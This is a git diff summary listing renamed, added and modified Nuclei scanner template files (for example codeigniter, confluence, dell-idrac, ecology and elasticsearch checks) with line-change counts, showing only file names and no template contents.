.../Other/codeigniter-env-1134.yaml | 34 + nuclei-templates/Other/codeigniter-env.yaml | 31 - .../Other/codeigniter-installer.yaml | 5 +- .../Other/codemeter-webadmin-panel.yaml | 14 +- .../Other/codemeter-webadmin.yaml | 5 +- .../Other/codepen-login-check.yaml | 5 +- nuclei-templates/Other/codian-mcu-login.yaml | 7 +- nuclei-templates/Other/codis-dashboard.yaml | 5 +- .../Other/cofense-vision-detection.yaml | 28 + .../Other/cofense-vision-panel.yaml | 27 - .../Other/coinbase-access-token.yaml | 5 +- ...1149.yaml => cold-fusion-cfcache-map.yaml} | 0 .../coldfusion-administrator-login-1146.yaml | 23 + .../Other/coldfusion-administrator-login.yaml | 23 - .../Other/coldfusion-debug-xss-1154.yaml | 31 + .../Other/coldfusion-debug-xss-1155.yaml | 30 - .../Other/collectd-exporter-metrics.yaml | 7 +- .../Other/collibra-properties.yaml | 14 +- .../Other/comai-ras-cookie-bypass.yaml | 6 +- .../Other/coming-soon-page-detect.yaml | 5 +- nuclei-templates/Other/coming-soon.yaml | 2 +- .../Other/command-api-explorer.yaml | 11 +- .../commax-credentials-disclosure-1160.yaml | 29 + .../Other/commax-credentials-disclosure.yaml | 30 - nuclei-templates/Other/compal-panel.yaml | 16 - nuclei-templates/Other/compal.yaml | 17 + .../Other/compalex-panel-detect.yaml | 6 +- .../Other/completeview-web-panel.yaml | 9 +- nuclei-templates/Other/complianz-gdpr.yaml | 4 +- .../Other/composer-auth-json.yaml | 6 +- .../Other/compromised-elasticsearch.yaml | 58 +- .../comtrend-password-exposure-1168.yaml | 27 - .../Other/comtrend-password-exposure.yaml | 23 + .../Other/concourse-ci-panel-1170.yaml | 24 - .../Other/concourse-ci-panel.yaml | 19 + .../Other/concrete-installer.yaml | 5 +- ...e-xss-1176.yaml => concrete-xss-1177.yaml} | 0 nuclei-templates/Other/config-json.yaml | 19 +- nuclei-templates/Other/config-properties.yaml | 4 +- ...2.yaml => configuration-listing-1184.yaml} | 0 .../Other/configure-aaa-service.yaml | 15 +- .../Other/configure-dns-server.yaml | 7 +- .../configure-service-timestamps-debug.yaml | 15 +- ...figure-service-timestamps-logmessages.yaml | 17 +- .../Other/configure-session-timeout.yaml | 7 +- .../Other/confluence-dashboard.yaml | 6 +- ...etect.yaml => confluence-detect-1186.yaml} | 0 .../Other/confluence-oauth-admin.yaml | 6 +- .../confluence-ssrf-sharelinks-1191.yaml | 31 + .../confluence-ssrf-sharelinks-1192.yaml | 21 - .../Other/confluent-access-token.yaml | 6 +- .../Other/confluent-secret-token.yaml | 6 +- nuclei-templates/Other/connect-box-login.yaml | 15 +- nuclei-templates/Other/connection_broker.yaml | 20 + .../Other/connectwise-backup-manager.yaml | 9 +- .../Other/connectwise-control-detect.yaml | 5 +- nuclei-templates/Other/connectwise-panel.yaml | 8 +- nuclei-templates/Other/contacam-1198.yaml | 3 +- .../Other/contact-form-7-honeypot.yaml | 2 +- .../Other/contact-form-7-plugin.yaml | 58 - nuclei-templates/Other/contact-form-7.yaml | 48 + .../Other/contact-form-cfdb7.yaml | 2 +- .../Other/contao-login-panel.yaml | 13 +- .../Other/content-central-login.yaml | 9 +- .../Other/contentful-api-token.yaml | 5 +- .../Other/contentify-installer.yaml | 5 +- .../Other/contentkeeper-detect-1201.yaml | 3 +- .../Other/control4-default-login.yaml | 8 +- .../Other/contus-video-gallery-sqli.yaml | 57 +- nuclei-templates/Other/cookie-injection.yaml | 34 - nuclei-templates/Other/cookie-law-info.yaml | 4 +- nuclei-templates/Other/cookie-notice.yaml | 2 +- .../Other/core-chuangtian-cloud-rce-1210.yaml | 45 - .../Other/core-chuangtian-cloud-rce-1212.yaml | 38 + nuclei-templates/Other/core-dump.yaml | 4 +- nuclei-templates/Other/corebos-htaccess.yaml | 5 +- nuclei-templates/Other/corebos-panel.yaml | 12 +- .../coremail-config-disclosure-1215.yaml | 23 + .../Other/coremail-config-disclosure.yaml | 28 - ...fig-1222.yaml => cors-misconfig-1221.yaml} | 0 .../Other/cortex-xsoar-login-1227.yaml | 23 - .../Other/cortex-xsoar-login-1229.yaml | 23 + ...i-1233.yaml => couchbase-buckets-api.yaml} | 0 .../Other/couchdb-adminparty-1234.yaml | 28 - .../Other/couchdb-adminparty-1237.yaml | 26 + nuclei-templates/Other/covenant-c2-jarm.yaml | 5 +- nuclei-templates/Other/covenant-c2-ssl.yaml | 6 +- nuclei-templates/Other/covenant-c2.yaml | 5 +- nuclei-templates/Other/cpanel-api-codes.yaml | 13 +- .../Other/cql-native-transport.yaml | 76 +- .../Other/craft-cms-detect-1247.yaml | 28 + nuclei-templates/Other/craft-cms-detect.yaml | 27 - ...el.yaml => craftcms-admin-panel-1245.yaml} | 0 nuclei-templates/Other/cratesio-api-key.yaml | 4 +- nuclei-templates/Other/crawlab-lfi.yaml | 4 +- .../Other/creame-whatsapp-me.yaml | 2 +- .../Other/creatio-login-panel.yaml | 9 +- .../creative-mail-by-constant-contact.yaml | 4 +- .../Other/credential-exposure-1250.yaml | 4149 +- nuclei-templates/Other/credentials-1257.yaml | 16 - .../Other/credentials-disclosure-1252.yaml | 712 - .../Other/credentials-disclosure-1255.yaml | 712 + nuclei-templates/Other/credentials-json.yaml | 6 +- nuclei-templates/Other/credentials.yaml | 13 + nuclei-templates/Other/crimson-malware.yaml | 4 +- .../Other/crlf-injection-1263.yaml | 49 +- nuclei-templates/Other/crmeb.yaml | 20 + nuclei-templates/Other/crontab-ui.yaml | 5 +- .../Other/cross-origin-embedder-policy.yaml | 2 +- .../Other/cross-origin-opener-policy.yaml | 7 +- .../Other/cross-origin-resource-policy.yaml | 4 +- nuclei-templates/Other/crossdomain-xml.yaml | 3 +- nuclei-templates/Other/crunchrat-malware.yaml | 8 +- .../Other/crush-ftp-detect-1271.yaml | 40 +- .../Other/crypto-mining-malware.yaml | 4 +- nuclei-templates/Other/cryptobox-panel.yaml | 5 +- .../Other/cryptxxx-dropper-malware.yaml | 6 +- nuclei-templates/Other/cryptxxx-malware.yaml | 6 +- .../Other/crystal-live-http-server-lfi.yaml | 2 +- .../Other/crystal-live-server-lfi.yaml | 6 +- .../cs-cart-unauthenticated-lfi-1285.yaml | 21 + .../Other/cs-cart-unauthenticated-lfi.yaml | 20 - .../Other/cs141-default-login-1280.yaml | 18 +- nuclei-templates/Other/cs141.yaml | 20 + .../{csod-panel.yaml => csod-panel-1286.yaml} | 0 .../Other/csrfguard-detect-1290.yaml | 72 + .../Other/csrfguard-detect-1291.yaml | 71 - .../Other/cucm-username-enumeration-1294.yaml | 8 +- nuclei-templates/Other/cudatel-panel.yaml | 9 +- nuclei-templates/Other/curcy-xss.yaml | 15 +- nuclei-templates/Other/custom-css-js.yaml | 2 +- .../custom-data-result-service-detect.yaml | 19 + .../custom-datadump-source-code-detect.yaml | 20 - nuclei-templates/Other/custom-fonts.yaml | 4 +- .../Other/custom-post-limits.yaml | 59 + .../Other/custom-post-type-ui.yaml | 2 +- .../Other/custom-solr-file-read.yaml | 50 - .../Other/custom-swagger-ui-detect.yaml | 68 - nuclei-templates/Other/custom-xss-check.yaml | 37 + nuclei-templates/Other/custom_nuclei-5.yaml | 44 - nuclei-templates/Other/custom_nuclei-8.yaml | 48 + .../Other/cvent-panel-detect.yaml | 9 +- nuclei-templates/Other/cvms-sqli.yaml | 10 +- nuclei-templates/Other/cxpid-malware.yaml | 5 +- .../Other/cyberoam-ssl-vpn-panel.yaml | 18 +- .../Other/cypress-web-config.yaml | 12 +- nuclei-templates/Other/cythosia-malware.yaml | 6 +- .../Other/d-link-arbitary-fileread-7044.yaml | 26 - .../Other/d-link-arbitary-fileread-7045.yaml | 21 + .../Other/d-link-wireless-7050.yaml | 23 - nuclei-templates/Other/d-link-wireless.yaml | 23 + nuclei-templates/Other/dahua-web-panel.yaml | 5 +- nuclei-templates/Other/darkrat-malware.yaml | 4 +- nuclei-templates/Other/darkstat-detect.yaml | 3 - .../Other/darktrace-threat-visualizer.yaml | 12 +- nuclei-templates/Other/dash-panel-detect.yaml | 8 +- nuclei-templates/Other/dashy-panel.yaml | 8 +- .../Other/data_science_studio.yaml | 20 + .../Other/database-credentials.yaml | 42 +- ...ror-6768.yaml => database-error-6771.yaml} | 0 .../Other/database.json-exposure.yaml | 2 +- .../Other/databricks-api-token.yaml | 5 +- .../Other/datadog-access-token.yaml | 5 +- .../Other/datadog-login-check.yaml | 4 +- nuclei-templates/Other/datadog-login.yaml | 9 +- nuclei-templates/Other/dataease-panel.yaml | 8 +- nuclei-templates/Other/dataease.yaml | 20 + .../Other/datahub-metadata-default-login.yaml | 5 +- nuclei-templates/Other/datahub.yaml | 20 + .../Other/dataiku-default-login.yaml | 5 +- nuclei-templates/Other/dataiku-panel.yaml | 9 +- nuclei-templates/Other/datasplice-panel.yaml | 2 - nuclei-templates/Other/davantis-panel.yaml | 9 +- .../Other/daybyday-detect-6772.yaml | 24 - nuclei-templates/Other/daybyday-detect.yaml | 24 + .../Other/db-backup-lfi-6776.yaml | 30 + nuclei-templates/Other/db-backup-lfi.yaml | 31 - nuclei-templates/Other/db-xml-file.yaml | 13 +- .../Other/dbeaver-credentials-6780.yaml | 12 +- .../Other/dbeaver-database-connections.yaml | 12 +- nuclei-templates/Other/dcrat-server-c2.yaml | 5 +- nuclei-templates/Other/ddostf-malware.yaml | 5 +- ...me.yaml => dead-host-with-cname-6787.yaml} | 0 .../Other/deadbolt-ransomware.yaml | 9 +- ...bled-6790.yaml => debug-enabled-6788.yaml} | 0 ...dedecms-carbuyaction-fileinclude-6793.yaml | 30 - ...dedecms-carbuyaction-fileinclude-6794.yaml | 24 + .../Other/dedecms-config-xss.yaml | 5 +- nuclei-templates/Other/dedecms-detect.yaml | 21 +- .../Other/dedecms-membergroup-sqli-6796.yaml | 26 + .../Other/dedecms-membergroup-sqli.yaml | 20 - ...02.yaml => dedecms-openredirect-6803.yaml} | 0 nuclei-templates/Other/dedecms-rce.yaml | 5 +- nuclei-templates/Other/deep-link-detect.yaml | 12 +- .../Other/defaced-website-detect.yaml | 5 +- ...yaml => default-apache-test-all-6814.yaml} | 0 .../Other/default-apache-test-page-6818.yaml | 19 + .../Other/default-apache-test-page.yaml | 17 - .../default-apache2-ubuntu-page-6809.yaml | 17 + .../Other/default-apache2-ubuntu-page.yaml | 18 - .../Other/default-asp-net-page-6822.yaml | 16 + .../Other/default-asp-net-page.yaml | 17 - .../Other/default-cakephp-page.yaml | 5 +- .../Other/default-centos-test-page.yaml | 5 +- .../Other/default-codeigniter-page-6833.yaml | 20 + .../Other/default-codeigniter-page.yaml | 23 - ...age.yaml => default-django-page-6842.yaml} | 0 ...ge.yaml => default-fastcgi-page-6845.yaml} | 0 .../Other/default-fedora-page-6848.yaml | 17 + .../Other/default-fedora-page-6850.yaml | 18 - .../default-glassfish-server-page-6854.yaml | 18 + .../Other/default-glassfish-server-page.yaml | 17 - .../Other/default-ibm-http-server-6857.yaml | 23 + .../Other/default-jetty-page-6863.yaml | 17 + .../Other/default-jetty-page.yaml | 18 - .../Other/default-lighttpd-page.yaml | 20 - .../default-lighttpd-placeholder-page.yaml | 5 +- .../Other/default-lucee-page-6871.yaml | 5 +- ...=> default-microsoft-azure-page-6873.yaml} | 0 .../Other/default-movable-page.yaml | 4 +- .../Other/default-nginx-page.yaml | 5 +- .../Other/default-openresty-6884.yaml | 17 + nuclei-templates/Other/default-openresty.yaml | 18 - .../default-oracle-application-page.yaml | 6 +- .../Other/default-page-azure-container.yaml | 5 +- .../Other/default-parallels-plesk.yaml | 5 +- ...l => default-payara-server-page-6895.yaml} | 0 .../Other/default-plesk-page-6900.yaml | 17 + .../Other/default-plesk-page.yaml | 18 - .../Other/default-redhat-test-page.yaml | 5 +- .../Other/default-runcloud-page.yaml | 5 +- .../Other/default-symfony-page.yaml | 7 +- .../Other/default-tengine-page.yaml | 7 +- .../Other/default-tomcat-page-6911.yaml | 18 + .../Other/default-websphere-liberty.yaml | 5 +- .../default-windows-server-page-6912.yaml | 17 + .../default-windows-server-page-6914.yaml | 18 - nuclei-templates/Other/deimos-c2-jarm.yaml | 5 +- nuclei-templates/Other/deimos-c2.yaml | 5 +- nuclei-templates/Other/delicate.yaml | 59 + .../Other/dell-bmc-panel-detect.yaml | 6 +- .../dell-emc-ecom-default-credentials.yaml | 26 + .../Other/dell-idrac-default-login-6946.yaml | 36 - .../Other/dell-idrac-default-login.yaml | 24 + nuclei-templates/Other/dell-idrac.yaml | 5 +- .../Other/dell-idrac6-detect-6918.yaml | 29 - .../Other/dell-idrac6-detect-6919.yaml | 25 + .../Other/dell-idrac7-detect-6923.yaml | 29 + .../Other/dell-idrac7-detect.yaml | 29 - .../Other/dell-idrac8-detect.yaml | 6 +- .../Other/dell-idrac9-default-login-6933.yaml | 37 + .../Other/dell-idrac9-default-login.yaml | 35 - .../Other/dell-idrac9-detect-6938.yaml | 30 + .../Other/dell-idrac9-detect-6939.yaml | 35 - .../Other/dell-openmanager-login-6948.yaml | 23 + .../Other/dell-openmanager-login.yaml | 26 - nuclei-templates/Other/dell-wyse-login.yaml | 7 +- ... => dell-wyse-management-suite-login.yaml} | 0 nuclei-templates/Other/delta-login-panel.yaml | 7 +- .../Other/deluge-webui-panel.yaml | 14 +- .../Other/deos-open500-admin.yaml | 6 +- .../Other/deos-openview-admin.yaml | 8 +- .../Other/deprecated-sshv1-detection.yaml | 6 +- .../Other/deprecated-tls-6958.yaml | 20 - nuclei-templates/Other/deprecated-tls.yaml | 17 + .../Other/dericam-login-6962.yaml | 26 - nuclei-templates/Other/dericam-login.yaml | 22 + nuclei-templates/Other/derkziel-malware.yaml | 6 +- .../Other/desktop-ini-exposure.yaml | 5 +- ...l => detect-addpac-voip-gateway-6965.yaml} | 0 .../Other/detect-all-takeover.yaml | 183 - .../Other/detect-dangling-cname-6966.yaml | 32 - .../Other/detect-dangling-cname.yaml | 32 + ...s.yaml => detect-dns-over-https-6970.yaml} | 0 .../Other/detect-drone-config.yaml | 2 +- .../Other/detect-jabber-xmpp.yaml | 7 +- ...d.yaml => detect-options-method-6976.yaml} | 0 .../Other/detect-rsyncd-6979.yaml | 28 - .../Other/detect-rsyncd-6981.yaml | 27 + nuclei-templates/Other/detect-sentry.yaml | 11 +- nuclei-templates/Other/detect-ssl-issuer.yaml | 8 +- .../Other/detection-elasticsearch.yaml | 22 - .../Other/detection-zookeeper.yaml | 22 - ...t-logs.yaml => development-logs-6987.yaml} | 0 nuclei-templates/Other/deviantart.yaml | 33 +- nuclei-templates/Other/dexter-malware.yaml | 6 +- .../Other/diamondfox-malware.yaml | 6 +- ...fileread(1).yaml => diaowen-fileread.yaml} | 0 .../Other/diarise-theme-lfi-6992.yaml | 22 + nuclei-templates/Other/diarise-theme-lfi.yaml | 26 - .../Other/dicoogle-pacs-lfi-6993.yaml | 29 + .../Other/dicoogle-pacs-lfi-6995.yaml | 25 - .../Other/digital-ocean-ssrf.yaml | 7 +- ...nage-rce.yaml => digital-signage-rce.yaml} | 0 .../Other/digitalocean-access-token.yaml | 6 +- .../Other/digitalocean-personal-access.yaml | 6 +- .../Other/digitalocean-refresh-token.yaml | 6 +- .../Other/digitalrebar-default-login.yaml | 8 +- .../Other/digitalrebar-login.yaml | 18 +- .../digitalrebar-provision-default-login.yaml | 9 +- .../Other/digitalrebar-provision-ui.yaml | 5 - .../Other/digitalrebar-traversal.yaml | 19 +- nuclei-templates/Other/dir-845l.yaml | 20 + .../Other/dir-850l-login-panel.yaml | 25 - nuclei-templates/Other/dir-listing-7006.yaml | 19 + nuclei-templates/Other/dir-listing.yaml | 20 - ...yaml => directadmin-login-panel-7000.yaml} | 0 .../Other/directory-traversal-7002.yaml | 78 +- nuclei-templates/Other/directum-login.yaml | 10 +- nuclei-templates/Other/directus-detect.yaml | 2 +- nuclei-templates/Other/disable-comments.yaml | 2 +- nuclei-templates/Other/disable-gutenberg.yaml | 2 +- .../Other/disable-ip-source-route.yaml | 14 +- .../Other/disable-pad-service.yaml | 13 +- nuclei-templates/Other/discord-api-token.yaml | 6 +- .../Other/discord-cilent-secret.yaml | 6 +- nuclei-templates/Other/discord-client-id.yaml | 6 +- .../Other/discourse-installer.yaml | 5 +- nuclei-templates/Other/discourse-xss.yaml | 6 +- ...ileRead.yaml => discuz-config-global.yaml} | 0 nuclei-templates/Other/discuz-panel.yaml | 7 +- ...aml => dixell-xweb500-filewrite-7019.yaml} | 0 .../Other/django-admin-panel-7021.yaml | 18 - .../Other/django-admin-panel-7023.yaml | 18 + ...ect.yaml => django-debug-detect-7024.yaml} | 0 ...e.yaml => django-debug-exposure-7029.yaml} | 0 ... => django-framework-exceptions-7034.yaml} | 0 nuclei-templates/Other/django-secret-key.yaml | 31 - nuclei-templates/Other/django-secret.key.yaml | 62 + .../Other/django-variables-exposed.yaml | 11 +- ...35.yaml => dlink-850l-info-leak-7038.yaml} | 0 nuclei-templates/Other/dlink-netgear-xss.yaml | 15 +- nuclei-templates/Other/dmarc-detect.yaml | 17 +- nuclei-templates/Other/dns-320l.yaml | 20 + .../Other/dns-saas-service-detection.yaml | 7 +- .../Other/dns-waf-detect-7054.yaml | 6 + .../Other/docebo-elearning-panel.yaml | 9 +- nuclei-templates/Other/docker-cloud.yaml | 6 +- .../Other/docker-compose-config-7057.yaml | 27 + .../Other/docker-compose-config.yaml | 31 - .../Other/docker-hub-login-check.yaml | 5 +- .../Other/docker-registry-7064.yaml | 20 + .../Other/docker-registry-7067.yaml | 23 - nuclei-templates/Other/dockge-panel.yaml | 6 +- .../Other/docmosis-tornado-server.yaml | 5 +- .../Other/dokuwiki-installer.yaml | 5 +- nuclei-templates/Other/dokuwiki-panel.yaml | 4 +- ...ct-7069.yaml => dolibarr-detect-7071.yaml} | 0 .../Other/dolibarr-installer.yaml | 5 +- .../dolphinscheduler-default-login-7072.yaml | 48 + .../Other/dolphinscheduler-default-login.yaml | 47 - nuclei-templates/Other/dom-invaider.yaml | 43 - nuclei-templates/Other/dom-xss-7080.yaml | 54 + nuclei-templates/Other/dompdf-config.yaml | 5 +- .../Other/doorgets-info-disclosure.yaml | 5 +- nuclei-templates/Other/doppler-api-token.yaml | 5 +- nuclei-templates/Other/doris-panel.yaml | 4 +- nuclei-templates/Other/dos.yaml | 41 + nuclei-templates/Other/dotclear-detect.yaml | 22 + ...7085.yaml => dotcms-admin-panel-7087.yaml} | 0 .../Other/dotnet-remoting-service-detect.yaml | 17 +- .../Other/dotnetcms-sqli-7089.yaml | 36 - nuclei-templates/Other/dotnetcms-sqli.yaml | 25 + nuclei-templates/Other/dplus-dashboard.yaml | 9 +- .../Other/dqs-superadmin-panel.yaml | 9 +- nuclei-templates/Other/dradis-pro-panel.yaml | 9 +- .../Other/drawio-flowchartmaker-panel.yaml | 15 +- nuclei-templates/Other/drone-ci-panel.yaml | 17 +- .../Other/droneci-access-token.yaml | 5 +- .../Other/dropbear-cbc-ciphers.yaml | 14 +- nuclei-templates/Other/dropbear-weakalgo.yaml | 12 +- nuclei-templates/Other/dropbear-weakmac.yaml | 12 +- nuclei-templates/Other/dropbox-api-token.yaml | 6 +- .../Other/dropbox-longlived-token.yaml | 6 +- .../Other/dropbox-shortlived-token.yaml | 6 +- .../Other/druid-console-exposure.yaml | 3 - nuclei-templates/Other/druid-detect.yaml | 24 + ...itor-7103.yaml => druid-monitor-7100.yaml} | 0 nuclei-templates/Other/drupal-avatar-xss.yaml | 7 +- nuclei-templates/Other/drupal-detect.yaml | 14 +- ...-install.yaml => drupal-install-7106.yaml} | 0 .../Other/drupal-jsonapi-user-listing.yaml | 21 +- ...ml => drupal-user-enum-redirect-7115.yaml} | 0 .../{signatures-10262.yaml => drupal.yaml} | 0 ..._module-addtoany-cross-site-scripting.yaml | 34 +- ...l_module-context-cross-site-scripting.yaml | 18 +- ...ookie_compliance-cross-site-scripting.yaml | 11 +- ...al_module-facets-cross-site-scripting.yaml | 11 +- ...drupal_module-gutenberg-access-bypass.yaml | 10 +- ...le-opigno_learning_path-access-bypass.yaml | 19 +- ...ule-permissions_by_term-access-bypass.yaml | 88 +- .../drupal_module-s3fs-access-bypass.yaml | 32 +- ...rch_autocomplete-cross-site-scripting.yaml | 25 +- .../drupal_module-services-access-bypass.yaml | 8 +- nuclei-templates/Other/ds_store.yaml | 37 +- .../Other/dss-download-fileread-7116.yaml | 15 +- .../Other/dubbo-admin-default-login-7120.yaml | 46 - .../Other/dubbo-admin-default-login.yaml | 41 + nuclei-templates/Other/duffel-api-token.yaml | 5 +- nuclei-templates/Other/duplicate-page.yaml | 2 +- nuclei-templates/Other/duplicate-post.yaml | 2 +- nuclei-templates/Other/duplicator.yaml | 2 +- .../duracelltomi-google-tag-manager.yaml | 4 +- ...ogin.yaml => dvwa-default-login-7128.yaml} | 0 .../dvwa-headless-automatic-login-7131.yaml | 44 + .../Other/dvwa-headless-automatic-login.yaml | 43 - .../Other/dwr-921-login-panel.yaml | 30 + .../Other/dwr-index-detect-7135.yaml | 27 + nuclei-templates/Other/dwr-index-detect.yaml | 23 - ...xposure.yaml => dwsync-exposure-7138.yaml} | 0 nuclei-templates/Other/dxplanning-panel.yaml | 5 +- ...l => dynamic-broadcast-receiver-7142.yaml} | 0 ...-panel.yaml => dynamicweb-panel-7144.yaml} | 0 .../Other/dynamicweb-workflow.yaml | 5 +- nuclei-templates/Other/dynatrace-panel.yaml | 6 +- nuclei-templates/Other/dynatrace-token.yaml | 16 - .../Other/dzs-zoomsounds-listing-7148.yaml | 20 + .../Other/dzs-zoomsounds-listing.yaml | 25 - nuclei-templates/Other/dzzoffice-install.yaml | 20 +- nuclei-templates/Other/dzzoffice-panel.yaml | 10 +- nuclei-templates/Other/dzzoffice-xss.yaml | 5 +- nuclei-templates/Other/dzzoffice.yaml | 20 + nuclei-templates/Other/e-cology.yaml | 23 + ...-database.yaml => e-message-database.yaml} | 0 nuclei-templates/Other/e-mobile-panel.yaml | 14 +- nuclei-templates/Other/eMerge-panel.yaml | 14 +- nuclei-templates/Other/earcu-panel.yaml | 5 +- nuclei-templates/Other/easy-fancybox.yaml | 5 +- nuclei-templates/Other/easy-google-fonts.yaml | 6 +- .../easy-media-gallery-pro-listing-7150.yaml | 24 + .../Other/easy-media-gallery-pro-listing.yaml | 25 - .../Other/easy-table-of-contents.yaml | 2 +- .../Other/easy-wp-smtp-listing-7156.yaml | 19 + .../Other/easy-wp-smtp-listing.yaml | 21 - nuclei-templates/Other/easy-wp-smtp.yaml | 6 +- .../Other/easyimage-downphp-lfi.yaml | 4 +- nuclei-templates/Other/easyjob-panel.yaml | 6 +- .../Other/easypost-api-token.yaml | 6 +- .../Other/easypost-test-token.yaml | 6 +- .../Other/easyscripts-installer.yaml | 5 +- ...ery-restaurant-wp-theme-open-redirect.yaml | 3 - .../Other/ec2-detection-7162.yaml | 21 + nuclei-templates/Other/ec2-detection.yaml | 18 - .../Other/ec2-instance-information.yaml | 5 +- .../Other/eclipse-birt-panel.yaml | 8 +- .../ecoa-building-automation-lfd-7165.yaml | 27 - .../Other/ecoa-building-automation-lfd.yaml | 23 + .../ecology-arbitrary-file-upload-7169.yaml | 45 - .../Other/ecology-arbitrary-file-upload.yaml | 35 + nuclei-templates/Other/ecology-detect.yaml | 5 +- ...filedownload-directory-traversal-7172.yaml | 19 + ...logy-filedownload-directory-traversal.yaml | 20 - ...cology-oa-FileDownloadForOutDoc-sqli.yaml} | 0 .../Other/ecology-oa-byxml-xxe.yaml | 38 +- ...ingframework-directory-traversal-7175.yaml | 20 + ...y-springframework-directory-traversal.yaml | 21 - .../Other/ecology-syncuserinfo-sqli.yaml | 19 +- .../Other/ecology-v8-sqli-7179.yaml | 34 - nuclei-templates/Other/ecology-v8-sqli.yaml | 23 + .../Other/ecosys-command-center.yaml | 11 +- nuclei-templates/Other/ecshop-sqli.yaml | 3 - .../Other/ecsimagingpacs-rce.yaml | 9 +- nuclei-templates/Other/editor-exposure.yaml | 14 +- nuclei-templates/Other/efak-login-panel.yaml | 5 +- ...-7183.yaml => eg-manager-detect-7184.yaml} | 0 nuclei-templates/Other/eibiz-lfi-7186.yaml | 21 + nuclei-templates/Other/eibiz-lfi.yaml | 27 - .../Other/eibiz-server-3-8-0-lfi.yaml | 3 - .../Other/eko-management-console-login.yaml | 11 +- .../Other/eko-software-update-panel.yaml | 9 +- .../Other/elastic-hd-dashboard.yaml | 5 +- .../Other/elasticbeanstalk-takeover.yaml | 17 +- .../Other/elasticbeantalk-takeover.yaml | 6 - .../Other/elasticsearch-5-version.yaml | 5 - .../Other/elasticsearch-log4j.yaml | 11 +- .../elasticsearch-sql-client-detect-7190.yaml | 23 - .../elasticsearch-sql-client-detect.yaml | 23 + nuclei-templates/Other/elasticsearch.yaml | 29 + .../Other/elasticsearch5-log4j-rce.yaml | 26 +- ...yaml => electron-version-detect-7198.yaml} | 0 nuclei-templates/Other/elementor.yaml | 4 +- .../Other/elementorpage-open-redirect.yaml | 14 +- nuclei-templates/Other/elementskit-lite.yaml | 4 +- .../Other/elemiz-network-manager.yaml | 12 +- .../Other/elex-woocommerce-xss.yaml | 20 +- ...-detect.yaml => elfinder-detect-7202.yaml} | 0 ...l.yaml => elfinder-path-traversal(1).yaml} | 0 .../Other/elfinder-version-7205.yaml | 43 - nuclei-templates/Other/elfinder-version.yaml | 38 + nuclei-templates/Other/elfinder.yaml | 20 + .../Other/elmah-log-file-7207.yaml | 23 - nuclei-templates/Other/elmah-log-file.yaml | 18 + .../Other/email-extraction-7210.yaml | 22 + nuclei-templates/Other/email-extraction.yaml | 22 - .../Other/email-obfuscate-shortcode.yaml | 59 + nuclei-templates/Other/emby-panel.yaml | 13 +- .../Other/emcecom-default-login.yaml | 10 +- nuclei-templates/Other/emerge-workflow.yaml | 1 - .../Other/emerson-power-panel-7215.yaml | 25 - .../Other/emerson-power-panel.yaml | 21 + nuclei-templates/Other/empire-c2.yaml | 7 +- .../Other/empirec2-default-login.yaml | 43 +- nuclei-templates/Other/empirecms-detect.yaml | 5 +- .../Other/empirecms-xss-7220.yaml | 25 + nuclei-templates/Other/empirecms-xss.yaml | 20 - .../Other/emqx-default-login-7222.yaml | 39 + .../Other/emqx-default-login.yaml | 35 - nuclei-templates/Other/emqx-detect.yaml | 6 +- nuclei-templates/Other/emqx-detection.yaml | 3 - nuclei-templates/Other/emqx-panel.yaml | 4 +- nuclei-templates/Other/ems-sqli.yaml | 10 +- .../Other/enable-https-protocol.yaml | 7 +- .../Other/enable-media-replace.yaml | 2 +- ... enable-secret-for-user-and-password.yaml} | 0 .../Other/encompass-cm1-homepage.yaml | 7 +- .../Other/endpoint_protection_manager.yaml | 20 + .../Other/env-example-file-disclosure.yaml | 2 +- nuclei-templates/Other/envato-elements.yaml | 2 +- nuclei-templates/Other/environment-rb.yaml | 6 +- nuclei-templates/Other/envision-gateway.yaml | 3 - .../Other/envoy-admin-exposure.yaml | 5 +- nuclei-templates/Other/eos-http-browser.yaml | 5 +- nuclei-templates/Other/episerver-panel.yaml | 12 +- nuclei-templates/Other/epmp-login-7231.yaml | 21 + nuclei-templates/Other/epmp-login.yaml | 24 - nuclei-templates/Other/epp-server-lfi.yaml | 4 +- .../Other/epson-access-detect.yaml | 66 +- .../Other/epson-projector-detect.yaml | 52 +- .../Other/epson-web-control-detect-7239.yaml | 22 + .../Other/epson-web-control-detect.yaml | 25 - nuclei-templates/Other/erensoft-sqli.yaml | 14 +- nuclei-templates/Other/eris-xss.yaml | 8 +- nuclei-templates/Other/erlang-daemon.yaml | 17 +- .../Other/erp-nc-directory-traversal.yaml | 9 +- .../Other/error-based-sql-injection.yaml | 33 - nuclei-templates/Other/error-based.yaml | 32 + nuclei-templates/Other/erxes-detect.yaml | 5 +- .../Other/eset-protect-panel.yaml | 4 +- nuclei-templates/Other/eshop-installer.yaml | 5 +- nuclei-templates/Other/esmtp-detect.yaml | 65 +- .../Other/esmtprc-config-7260.yaml | 28 + nuclei-templates/Other/esmtprc-config.yaml | 31 - nuclei-templates/Other/espeasy-installer.yaml | 6 +- .../Other/espeasy-mega-exposure.yaml | 5 +- nuclei-templates/Other/esphome-dashboard.yaml | 5 +- nuclei-templates/Other/esphome-panel.yaml | 12 +- .../essential-addons-for-elementor-lite.yaml | 4 +- nuclei-templates/Other/esxi-system.yaml | 13 +- nuclei-templates/Other/etcd-keys-7261.yaml | 26 + nuclei-templates/Other/etcd-keys-7262.yaml | 25 - .../Other/etcd-unauthenticated-api.yaml | 2 - nuclei-templates/Other/etl3100.yaml | 22 + .../Other/etouch-v2-sqli-7268.yaml | 22 + nuclei-templates/Other/etouch-v2-sqli.yaml | 25 - nuclei-templates/Other/etsy-access-token.yaml | 5 +- .../Other/event-debug-server-status.yaml | 5 +- nuclei-templates/Other/eventum-panel.yaml | 19 +- nuclei-templates/Other/evilginx.yaml | 7 +- nuclei-templates/Other/evilginx2-jarm.yaml | 5 +- nuclei-templates/Other/evlink-panel.yaml | 7 +- nuclei-templates/Other/evse-web-panel.yaml | 12 +- .../ewebs-arbitrary-file-reading-7270.yaml | 31 + .../Other/ewebs-arbitrary-file-reading.yaml | 26 - nuclei-templates/Other/ewm-manager-panel.yaml | 14 +- .../Other/ewww-image-optimizer.yaml | 2 +- .../exacqvision-default-credentials.yaml | 5 - .../Other/exacqvision-default-login-7277.yaml | 43 + .../Other/exacqvision-default-login.yaml | 43 - .../Other/exagrid-manager-panel.yaml | 16 +- nuclei-templates/Other/example-template.yaml | 8 +- nuclei-templates/Other/exit-notifier.yaml | 59 + .../Other/exolis-engage-panel.yaml | 13 +- .../experience_manager_cloud_service.yaml | 21 + .../Other/exploit-CVE-2022-1388.yaml | 75 + nuclei-templates/Other/exposed-adb.yaml | 10 +- .../Other/exposed-alps-spring-7283.yaml | 30 + 